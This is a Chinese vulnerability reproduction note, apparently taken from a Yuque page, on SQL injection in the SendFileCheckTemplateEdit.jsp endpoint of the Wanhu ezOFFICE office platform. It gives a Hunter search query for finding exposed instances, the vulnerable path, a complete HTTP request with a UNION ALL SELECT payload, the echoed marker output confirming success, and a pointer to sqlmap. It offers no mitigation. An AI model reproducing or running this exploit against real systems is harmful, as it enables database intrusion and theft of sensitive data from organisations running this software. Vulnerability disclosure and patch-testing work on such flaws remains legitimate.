登录 白背景

万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞,<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。</font>

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

  • <font style="color:rgb(62, 62, 62);">万户ezoffice</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

  • <font style="color:rgb(62, 62, 62);">hunter</font><font style="color:rgb(62, 62, 62);">app.name="万户 Ezoffice OA"</font>
  • <font style="color:rgb(62, 62, 62);">登录页面</font>

1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1

1704766519532-ccf3c03c-8106-4133-94e3-53e73466fc94.png

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%2877%29%2BCHAR%2899%29%2BCHAR%2886%29%2BCHAR%2873%29%2BCHAR%2865%29%2BCHAR%2866%29%2BCHAR%28117%29%2BCHAR%2897%29%2BCHAR%2867%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%28110%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2878%29%2BCHAR%2866%29%2BCHAR%28107%29%2BCHAR%2883%29%2BCHAR%28103%29%2BCHAR%2867%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%28121%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2899%29%2BCHAR%2878%29%2BCHAR%28121%29%2BCHAR%2868%29%2BCHAR%28110%29%2BCHAR%2886%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--+QHgO HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=4E2455852565283AF1C96D72A82F0039; OASESSIONID=8CEBEFC17B098632FAECBAAFCFB50CE0; LocLan=zh_CN
Upgrade-Insecure-Requests: 1

1704767426291-f444b4c3-e773-42c3-a857-414eb01878e0.png

qkzqquMcVIABuaCzqEInJrNBkSgCWIVJADyZCxcNyDnVzqvzkq

sqlmap

/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1

1704767468665-954b4670-02aa-4567-b774-7ff3d8771768.png

原文: https://www.yuque.com/xiaokp7/ocvun2/hizpk0bq1bauyw50